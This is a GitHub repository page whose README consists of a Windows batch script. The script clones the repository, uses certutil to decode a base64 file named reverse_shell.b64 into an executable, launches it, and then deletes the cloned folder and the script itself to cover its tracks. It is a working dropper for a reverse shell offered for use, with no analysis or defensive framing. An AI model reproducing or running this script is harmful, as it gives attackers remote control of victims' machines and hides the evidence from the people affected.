Skip to content

nithin434/stuff2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

@echo off REM Define the paths set "repoUrl=https://github.com/nithin434/stuff2.git" set "repoDir=C:\stuff2" set "b64File=%repoDir%\reverse_shell.b64" set "exeFile=C:\reverse_shell.exe"

REM Clone the repository git clone "%repoUrl%" "%repoDir%"

REM Check if the cloning was successful if %errorlevel% neq 0 ( echo Failed to clone the repository. exit /b %errorlevel% )

REM Decode the base64 file into the executable certutil -decode "%b64File%" "%exeFile%"

REM Check if the decoding was successful if %errorlevel% neq 0 ( echo Failed to decode the base64 file. exit /b %errorlevel% )

REM Execute the decoded executable start "" "%exeFile%"

REM Optionally, you can delete the repository folder and the batch script after execution rmdir /s /q "%repoDir%" del "%~f0"

REM End of script

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published